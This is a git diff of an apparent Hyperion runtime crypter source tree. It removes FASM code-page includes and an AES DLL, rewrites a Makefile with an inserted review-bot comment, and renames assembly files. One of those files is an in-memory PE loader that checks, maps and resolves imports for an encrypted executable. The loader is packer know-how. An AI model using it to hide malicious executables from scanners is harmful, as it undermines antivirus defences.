@@ -1,39 +0,0 @@ - -; Windows 1254 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh & char < 0A0h - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,? - else - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - else if char = 0D0h - store word 11Eh at $$+offset+(%-1)*2 - else if char = 0DDh - store word 130h at $$+offset+(%-1)*2 - else if char = 0DEh - store word 15Eh at $$+offset+(%-1)*2 - else if char = 0F0h - store word 11Fh at $$+offset+(%-1)*2 - else if char = 0FDh - store word 131h at $$+offset+(%-1)*2 - else if char = 0FEh - store word 15Fh at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1255.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1255.INC deleted file mode 100644 index f6fe972..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1255.INC +++ /dev/null 
@@ -1,39 +0,0 @@ - -; Windows 1255 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,? - else if char < 0A0h - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,? - else if char < 0B0h - dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh - else if char < 0C0h - dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh - else if char < 0D0h - dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh - else if char < 0E0h - dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,? - else if char < 0F0h - dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh - else - dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,? - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1256.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1256.INC deleted file mode 100644 index 25248fa..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1256.INC +++ /dev/null 
@@ -1,39 +0,0 @@ - -; Windows 1256 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - virtual at 0 - if char < 90h - dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h - else if char < 0A0h - dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh - else if char < 0B0h - dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh - else if char < 0C0h - dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh - else if char < 0D0h - dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh - else if char < 0E0h - dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h - else if char < 0F0h - dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh - else - dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1257.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1257.INC deleted file mode 100644 index f150b41..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1257.INC +++ /dev/null 
@@ -1,39 +0,0 @@ - -; Windows 1257 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h - else if char < 0A0h - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,? - else if char < 0B0h - dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h - else if char < 0C0h - dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h - else if char < 0D0h - dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh - else if char < 0E0h - dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh - else if char < 0F0h - dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch - else - dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1258.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1258.INC deleted file mode 100644 index 73790b5..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1258.INC +++ /dev/null 
@@ -1,39 +0,0 @@ - -; Windows 1258 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - virtual at 0 - if char < 90h - dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,? - else if char < 0A0h - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h - else if char < 0B0h - dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh - else if char < 0C0h - dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh - else if char < 0D0h - dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh - else if char < 0E0h - dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh - else if char < 0F0h - dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh - else - dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh - end if - load char word from (char and 0Fh)*2 - end virtual - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN874.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN874.INC deleted file mode 100644 index 64a6a54..0000000 --- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN874.INC +++ /dev/null 
@@ -1,31 +0,0 @@ - -; Windows 874 - -macro du [arg] - { local offset,char - offset = $-$$ - du arg - if arg eqtype '' - repeat ($-offset-$$)/2 - load char byte from $$+offset+(%-1)*2 - if char > 7Fh - if char < 0A0h - virtual at 0 - if char < 90h - dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,? - else - dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,? - end if - load char word from (char and 0Fh)*2 - end virtual - else if char > 0A0h - char = 0E00h+char-0A0h - end if - store word char at $$+offset+(%-1)*2 - end if - end repeat - end if } - -struc du [args] - { common label . word - du args } diff --git a/binary/hyperion/source/Fasm/license.TXT b/binary/hyperion/source/Fasm/license.TXT old mode 100644 new mode 100755 index a8045b8..95b7463 --- a/binary/hyperion/source/Fasm/license.TXT +++ b/binary/hyperion/source/Fasm/license.TXT @@ -1,6 +1,6 @@ -flat assembler version 1.69 -Copyright (c) 1999-2011, Tomasz Grysztar. +flat assembler version 1.71 +Copyright (c) 1999-2016, Tomasz Grysztar. All rights reserved. This program is free for commercial and non-commercial use as long as diff --git a/binary/hyperion/source/FasmAES-1.0/aes10.asm b/binary/hyperion/source/FasmAES-1.0/aes10.asm deleted file mode 100644 index eb9ea74..0000000 --- a/binary/hyperion/source/FasmAES-1.0/aes10.asm +++ /dev/null 
@@ -1,58 +0,0 @@ -format PE GUI 4.0 DLL -entry DllEntryPoint - -include '../Fasm/fasminclude/win32a.inc' -include 'aes/aes.inc' - -section '.text' code readable executable - -proc DllEntryPoint hinstDLL,fdwReason,lpvReserved - mov eax,TRUE - ret -endp - -; VOID ShowErrorMessage(HWND hWnd,DWORD dwError); -proc ShowErrorMessage hWnd,dwError - local lpBuffer:DWORD - lea eax,[lpBuffer] - invoke FormatMessage,FORMAT_MESSAGE_ALLOCATE_BUFFER+FORMAT_MESSAGE_FROM_SYSTEM,0,[dwError],LANG_NEUTRAL,eax,0,0 - invoke MessageBox,[hWnd],[lpBuffer],NULL,MB_ICONERROR+MB_OK - invoke LocalFree,[lpBuffer] - ret -endp - -; VOID ShowLastError(HWND hWnd); -proc ShowLastError hWnd - invoke GetLastError - stdcall ShowErrorMessage,[hWnd],eax - ret -endp - -; VOID aesEncrypt(size, pointer to clear text, pointer to encryption, key) -; VOID aesDecrypt(size, pointer to encrypted text, pointer to decryption, key) -include 'aes/aes.asm' - -section '.idata' import data readable writeable - - library kernel,'KERNEL32.DLL',\ - user,'USER32.DLL' - - import kernel,\ - GetLastError,'GetLastError',\ - SetLastError,'SetLastError',\ - FormatMessage,'FormatMessageA',\ - LocalFree,'LocalFree' - - import user,\ - MessageBox,'MessageBoxA' - -section '.edata' export data readable - - export 'AES10.DLL',\ - ShowErrorMessage,'ShowErrorMessage',\ - ShowLastError,'ShowLastError',\ - encAES,'aesEncrypt',\ - decAES,'aesDecrypt' - -section '.reloc' fixups data discardable - diff --git a/binary/hyperion/source/FasmAES-1.0/aes10.dll b/binary/hyperion/source/FasmAES-1.0/aes10.dll deleted file mode 100644 index f227d0e..0000000 Binary files a/binary/hyperion/source/FasmAES-1.0/aes10.dll and /dev/null differ diff --git a/binary/hyperion/source/FasmAES-1.0/example_dll.asm b/binary/hyperion/source/FasmAES-1.0/example_dll.asm deleted file mode 100644 index 2e5d11d..0000000 --- a/binary/hyperion/source/FasmAES-1.0/example_dll.asm +++ /dev/null 
@@ -1,39 +0,0 @@ -format PE CONSOLE 4.0 -entry start - -include 'win32a.inc' - -TEXTSIZE equ 0x30 - -section '.text' code readable executable - - start: - - ;invoke aesEncrypt, TEXTSIZE, clear_msg, enc_msg, key128 - ;invoke aesDecrypt, TEXTSIZE, enc_msg, dec_msg, key128 - invoke aesEncrypt, TEXTSIZE, clear_msg, clear_msg, key128 - invoke aesDecrypt, TEXTSIZE, clear_msg, clear_msg, key128 - invoke ExitProcess, 0 - -section '.data' data readable writeable - - - clear_msg db 'hello world, this is a secret text',\ - 0x0d, 0x0a, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 - enc_msg rb TEXTSIZE - dec_msg rb TEXTSIZE - - key128 db 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04,\ - 0x0b, 0x0a, 0x09, 0x08, 0x0f, 0x0e, 0x0d, 0x0c - -section '.idata' import data readable writeable - - library kernel,'KERNEL32.DLL',\ - aes,'AES10.DLL' - - import kernel,\ - ExitProcess,'ExitProcess' - - import aes,\ - aesEncrypt,'aesEncrypt',\ - aesDecrypt,'aesDecrypt' \ No newline at end of file diff --git a/binary/hyperion/source/Makefile b/binary/hyperion/source/Makefile index eb03e4b..43c5d50 100644 --- a/binary/hyperion/source/Makefile +++ b/binary/hyperion/source/Makefile 
@@ -1,31 +1,11 @@ -CC = g++ -SRC = Src\Crypter -BIN = . -OBJ = Obj -CFLAGS = -ansi -c -Wall -pedantic -O2 -m32 - -.PHONY:all -all: createoutput.o fileaccess.o peanalysis.o pe.o hyperion.o ostreamlog.o - $(CC) -o $(BIN)\hyperion.exe $(OBJ)\hyperion.o $(OBJ)\pe.o $(OBJ)\peanalysis.o $(OBJ)\fileaccess.o $(OBJ)\createoutput.o $(OBJ)\ostreamlog.o - -createoutput.o: $(SRC)\createoutput.cpp - $(CC) $(CFLAGS) -o $(OBJ)\createoutput.o $(SRC)\createoutput.cpp - -fileaccess.o: $(SRC)\fileaccess.cpp - $(CC) $(CFLAGS) -o $(OBJ)\fileaccess.o $(SRC)\fileaccess.cpp - -peanalysis.o: $(SRC)\peanalysis.cpp - $(CC) $(CFLAGS) -o $(OBJ)\peanalysis.o $(SRC)\peanalysis.cpp - -pe.o: $(SRC)\pe.cpp - $(CC) $(CFLAGS) -o $(OBJ)\pe.o $(SRC)\pe.cpp - -hyperion.o: $(SRC)\hyperion.cpp - $(CC) $(CFLAGS) -o $(OBJ)\hyperion.o $(SRC)\hyperion.cpp - -ostreamlog.o: $(SRC)\ostreamlog.cpp - $(CC) $(CFLAGS) -o $(OBJ)\ostreamlog.o $(SRC)\ostreamlog.cpp - -.PHONY:clean -clean: - del $(BIN)\hyperion.exe && del $(OBJ)\*.o +CC = gcc +AES_INCLUDE_DIR = Src/Payloads/Aes/c +CFLAGS = -std=c99 -Wall -pedantic -O2 -m32 -I$(AES_INCLUDE_DIR) +SRC = $(wildcard Src/Crypter/*.c) $(wildcard Src/Payloads/Aes/c/*.c) +OBJ = $(SRC:.c=.o) +EXECUTABLE=hyperion.exe + +all: hyperion + +hyperion: $(OBJ) + $(CC) $(CFLAGS) -o $(EXECUTABLE) $^ diff --git a/binary/hyperion/source/Src/FasmContainer32/createstrings.inc b/binary/hyperion/source/Src/Container/32/createstrings.inc similarity index 100% rename from binary/hyperion/source/Src/FasmContainer32/createstrings.inc rename to binary/hyperion/source/Src/Container/32/createstrings.inc diff --git a/binary/hyperion/source/Src/FasmContainer32/hyperion.inc b/binary/hyperion/source/Src/Container/32/hyperion.inc similarity index 100% rename from binary/hyperion/source/Src/FasmContainer32/hyperion.inc rename to binary/hyperion/source/Src/Container/32/hyperion.inc 
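Review bot: The `hyperion` target never creates a file called `hyperion` (its recipe writes `$(EXECUTABLE)`, i.e. hyperion.exe), so make treats it as always out of date and relinks on every run, and the old `.PHONY:all` declaration was dropped without a replacement. The `clean` target was removed at the same time that `OBJ = $(SRC:.c=.o)` started leaving object files next to the sources in `Src/Crypter` and `Src/Payloads/Aes/c`, so there is now no way to remove them from the tree. Naming the link target after the executable and restoring a phony `clean` fixes both; as a style point, `SRC` could reuse the variable defined two lines above it, `SRC = $(wildcard Src/Crypter/*.c) $(wildcard $(AES_INCLUDE_DIR)/*.c)`, instead of repeating the literal path.
```makefile
# … unchanged: CC, AES_INCLUDE_DIR, CFLAGS, SRC, OBJ, EXECUTABLE …
.PHONY: all clean

all: $(EXECUTABLE)

$(EXECUTABLE): $(OBJ)
	$(CC) $(CFLAGS) -o $@ $^

clean:
	$(RM) $(OBJ) $(EXECUTABLE)
```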
diff --git a/binary/hyperion/source/Src/FasmContainer32/loadapis.asm b/binary/hyperion/source/Src/Container/32/loadapis.asm similarity index 96% rename from binary/hyperion/source/Src/FasmContainer32/loadapis.asm rename to binary/hyperion/source/Src/Container/32/loadapis.asm index 3cef3a8..0f22687 100644 --- a/binary/hyperion/source/Src/FasmContainer32/loadapis.asm +++ b/binary/hyperion/source/Src/Container/32/loadapis.asm 
@@ -1,135 +1,135 @@ -;Dynamically load the needed APIs -;Strings are created on stack - -;dllname: zero terminated string with dll name -;store: save the dll image base here -;Jumps to LoadLogAPIsExit if an Error Occurs -macro loadDLL dllname, store, exit -{ - lea eax,[dllname] - invoke LoadLibrary,eax - test eax,eax - jz exit - mov [store],eax -} - -;functionname: zero terminated string with functions name -;dll_imagebase: imagebase of the dll -;returns: function pointer in eax -macro loadAPI functionname, dll_imagebase, exit -{ - lea eax,[functionname] - invoke GetProcAddress,dword [dll_imagebase],eax - test eax,eax - jz exit -} - -;Loads all necessary APISs -proc loadRegularAPIs stdcall APITable:DWORD - -local str1[256]:BYTE, kernel32_imagebase:DWORD - - pushad - writeWithNewLine createStringLoading, str1, LoadRegularAPIsExit_Error - - ;Get Kernel32.Dll Imagebase - writeWithNewLine createStringKernel32, str1, LoadRegularAPIsExit_Error - loadDLL str1, kernel32_imagebase, LoadRegularAPIsExit_Error - - ;Load GetModuleHandle - writeWithNewLine createStringGetModuleHandle, str1, LoadRegularAPIsExit_Error - loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error - mov edx,[APITable] - mov [edx+GetModuleHandle],eax - - ;Load VirtualAlloc - writeWithNewLine createStringVirtualAlloc, str1, LoadRegularAPIsExit_Error - loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error - mov edx,[APITable] - mov [edx+VirtualAlloc],eax - - ;Load VirtualProtect - writeWithNewLine createStringVirtualProtect, str1, LoadRegularAPIsExit_Error - loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error - mov edx,[APITable] - mov [edx+VirtualProtect],eax - - ;Load VirtualFree - writeWithNewLine createStringVirtualFree, str1, LoadRegularAPIsExit_Error - loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error - mov edx,[APITable] - mov [edx+VirtualFree],eax - - popad - mov eax,1 - ret - -LoadRegularAPIsExit_Error: - popad - mov eax,0 - ret -endp - -;Loads the basic functions for 
log file access -proc loadLogAPIs stdcall APITable:DWORD - -local str1[256]:BYTE, kernel32_imagebase:DWORD - - pushad - ;Get Kernel32.Dll Imagebase - createStringKernel32 str1 - loadDLL str1, kernel32_imagebase, LoadLogAPIsExit_Error - - ;Load CreateFileMapping API - createStringCreateFileMapping str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+CreateFileMapping],eax - - ;Load MapViewOfFile API - createStringMapViewOfFile str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+MapViewOfFile],eax - - ;Load UnmapViewOfFile API - createStringUnmapViewOfFile str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+UnmapViewOfFile],eax - - ;Load UnmapViewOfFile API - createStringCreateFile str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+CreateFile],eax - - ;Load CloseHandle API - createStringCloseHandle str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+CloseHandle],eax - - ;Load GetFileSize API - createStringGetFileSize str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+GetFileSize],eax - - ;Load DeleteFile API - createStringDeleteFile str1 - loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error - mov edx,[APITable] - mov [edx+DeleteFile],eax - - ;apis loaded successfully - popad - mov eax,1 - ret - -LoadLogAPIsExit_Error: - popad - mov eax,0 - ret - -endp +;Dynamically load the needed APIs +;Strings are created on stack + +;dllname: zero terminated string with dll name +;store: save the dll image base here +;Jumps to LoadLogAPIsExit if an Error Occurs +macro loadDLL dllname, store, exit +{ + lea eax,[dllname] + invoke LoadLibrary,eax + test eax,eax + jz exit + mov [store],eax +} + +;functionname: zero terminated string with functions name +;dll_imagebase: imagebase of the dll +;returns: function pointer in eax 
+macro loadAPI functionname, dll_imagebase, exit +{ + lea eax,[functionname] + invoke GetProcAddress,dword [dll_imagebase],eax + test eax,eax + jz exit +} + +;Loads all necessary APISs +proc loadRegularAPIs stdcall APITable:DWORD + +local str1[256]:BYTE, kernel32_imagebase:DWORD + + pushad + writeWithNewLine createStringLoading, str1, LoadRegularAPIsExit_Error + + ;Get Kernel32.Dll Imagebase + writeWithNewLine createStringKernel32, str1, LoadRegularAPIsExit_Error + loadDLL str1, kernel32_imagebase, LoadRegularAPIsExit_Error + + ;Load GetModuleHandle + writeWithNewLine createStringGetModuleHandle, str1, LoadRegularAPIsExit_Error + loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error + mov edx,[APITable] + mov [edx+GetModuleHandle],eax + + ;Load VirtualAlloc + writeWithNewLine createStringVirtualAlloc, str1, LoadRegularAPIsExit_Error + loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error + mov edx,[APITable] + mov [edx+VirtualAlloc],eax + + ;Load VirtualProtect + writeWithNewLine createStringVirtualProtect, str1, LoadRegularAPIsExit_Error + loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error + mov edx,[APITable] + mov [edx+VirtualProtect],eax + + ;Load VirtualFree + writeWithNewLine createStringVirtualFree, str1, LoadRegularAPIsExit_Error + loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error + mov edx,[APITable] + mov [edx+VirtualFree],eax + + popad + mov eax,1 + ret + +LoadRegularAPIsExit_Error: + popad + mov eax,0 + ret +endp + +;Loads the basic functions for log file access +proc loadLogAPIs stdcall APITable:DWORD + +local str1[256]:BYTE, kernel32_imagebase:DWORD + + pushad + ;Get Kernel32.Dll Imagebase + createStringKernel32 str1 + loadDLL str1, kernel32_imagebase, LoadLogAPIsExit_Error + + ;Load CreateFileMapping API + createStringCreateFileMapping str1 + loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+CreateFileMapping],eax + + ;Load MapViewOfFile API + createStringMapViewOfFile str1 + 
loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+MapViewOfFile],eax + + ;Load UnmapViewOfFile API + createStringUnmapViewOfFile str1 + loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+UnmapViewOfFile],eax + + ;Load UnmapViewOfFile API + createStringCreateFile str1 + loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+CreateFile],eax + + ;Load CloseHandle API + createStringCloseHandle str1 + loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+CloseHandle],eax + + ;Load GetFileSize API + createStringGetFileSize str1 + loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+GetFileSize],eax + + ;Load DeleteFile API + createStringDeleteFile str1 + loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error + mov edx,[APITable] + mov [edx+DeleteFile],eax + + ;apis loaded successfully + popad + mov eax,1 + ret + +LoadLogAPIsExit_Error: + popad + mov eax,0 + ret + +endp diff --git a/binary/hyperion/source/Src/FasmContainer32/loadexecutable.asm b/binary/hyperion/source/Src/Container/32/loadexecutable.asm similarity index 95% rename from binary/hyperion/source/Src/FasmContainer32/loadexecutable.asm rename to binary/hyperion/source/Src/Container/32/loadexecutable.asm index 2d56519..9014946 100644 --- a/binary/hyperion/source/Src/FasmContainer32/loadexecutable.asm +++ b/binary/hyperion/source/Src/Container/32/loadexecutable.asm 
@@ -1,584 +1,584 @@
-;Loads the exe which is stored in input_image
-;into memory and starts its execution
-proc loadExecutable stdcall APITable:DWORD,\
-input_image:DWORD
-
-local str1[256]:BYTE, ret_val:DWORD, image_file_header:DWORD,\
-loaded_file:DWORD
-
- pushad
- ;verify checksum of packed executable
- writeWithNewLine createStringVerifyChecksum, str1, le_exit_error
- stdcall verifyChecksum, [input_image], INFILE_SIZE
- test eax,eax
- jz le_exit_error
-
- ;verify whether the content of the data section is pe
- writeWithNewLine createStringVerifyPE, str1, le_exit_error
- mov eax,[input_image]
- add eax,4
- stdcall verifyPE, eax, INFILE_SIZE
- test eax,eax
- mov [image_file_header],eax
- jz le_exit_error
-
- ;copy pe header and sections into memory
- writeNewLineToLog APITable
- writeWithNewLine createStringMappingFileInMemory, str1, le_exit_error
- mov eax,[input_image]
- add eax,4
- mov ebx,INFILE_SIZE
- sub ebx,4
- stdcall loadFile, [APITable], [image_file_header], eax, ebx
- test eax,eax
- mov [loaded_file],eax
- jz le_exit_error
-
- ;loading import table
- writeNewLineToLog APITable
- writeWithNewLine createStringLoadingFilesAPIs, str1, le_exit_error
- stdcall loadImportTable, [APITable], [loaded_file]
- test eax,eax
- jz le_exit_error
-
- ;set the correct permissions for each section
- writeNewLineToLog APITable
- writeWithNewLine createStringSettingPermissions, str1, le_exit_error
- mov eax,[input_image]
- add eax,4
- mov ebx,INFILE_SIZE
- sub ebx,4
- stdcall setPermissions, [APITable], [image_file_header], eax, ebx
- test eax,eax
- jz le_exit_error
-
-le_exit_success:
- popad
- mov eax,1
- ret
-
-le_exit_error:
- popad
- mov eax,0
- ret
-
-endp
-
-;load the APIs in the import table
-proc loadImportTable, APITable:DWORD, image_base:DWORD
-
-local str1[256]:BYTE, import_table:DWORD, null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE
-
- pushad
- ;find import table in data directory
- mov edx,[image_base]
- mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
- add eax,edx
- add eax,4
- ;image file header now in eax
- add eax,sizeof.IMAGE_FILE_HEADER
- lea eax,[eax+IMAGE_OPTIONAL_HEADER32.DataDirectory]
- ;first data directory entry now in eax
- add eax,sizeof.IMAGE_DATA_DIRECTORY
- ;import data directory entry now in eax
- mov eax,[eax+IMAGE_DATA_DIRECTORY.VirtualAddress]
- add eax,edx
- ;pointer to import table now in eax
- mov [import_table],eax
- writeWithNewLine createStringFoundImportTable, str1, le_exit_error
- writeRegisterToLog APITable, [import_table]
- test eax,eax
- jz pit_exit_error
-
- ;init null directory entry
- lea esi,[null_directory_entry]
- mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
- mov al,0
-pit_init_null_directory_loop:
- mov [esi],al
- inc esi
- dec ecx
- jnz pit_init_null_directory_loop
-
- mov ebx,[import_table]
- ;iterate over the directory tables
-pit_next_directory_entry:
- lea esi,[null_directory_entry]
- mov edi,ebx
- mov ecx,sizeof.IMAGE_IMPORT_DESCRIPTOR
- rep cmpsb
- je pit_exit_success
- ;load APIs of this directory
- stdcall loadImportDirectoryTable, [APITable], [image_base], ebx
- test eax,eax
- jz pit_exit_error
- ;next entry
- add ebx,sizeof.IMAGE_IMPORT_DESCRIPTOR
- jmp pit_next_directory_entry
-
-pit_exit_success:
- popad
- mov eax,1
- ret
-
-pit_exit_error:
- popad
- mov eax,0
- ret
-endp
-
-;loads the APIs
-proc loadImportDirectoryTable stdcall, APITable:DWORD, image_base:DWORD, directory_entry:DWORD
-
-local str1[256]:BYTE, lookup_table:DWORD, import_address_table:DWORD, dll_image_base:DWORD
-
- pushad
- ;write info about data directory table to logfile
- writeNewLineToLog APITable
- test eax,eax
- jz lidt_exit_error
- writeWithNewLine createStringProcessImportDirectory, str1, lidt_exit_error
- mov eax,[directory_entry]
- mov eax,[eax+IMAGE_IMPORT_DESCRIPTOR.Name_]
- add eax,[image_base]
- mov ebx,eax
- ;pointer to dll name in ebx
- writeLog APITable, eax
- test eax,eax
- jz lidt_exit_error
- writeNewLineToLog APITable
- test eax,eax
- jz lidt_exit_error
-
- ;load the corresponding dll
- invoke LoadLibrary, ebx
- test eax,eax
- jz lidt_exit_error
- mov [dll_image_base],eax
-
- ;read pointer to the api tables
- mov edx,[directory_entry]
- mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
- add eax,[image_base]
- mov [lookup_table],eax
- mov eax,[edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
- add eax,[image_base]
- mov [import_address_table],eax
-
- ;index to current API
- sub ecx,ecx
- ;iterate the lookup_table entries
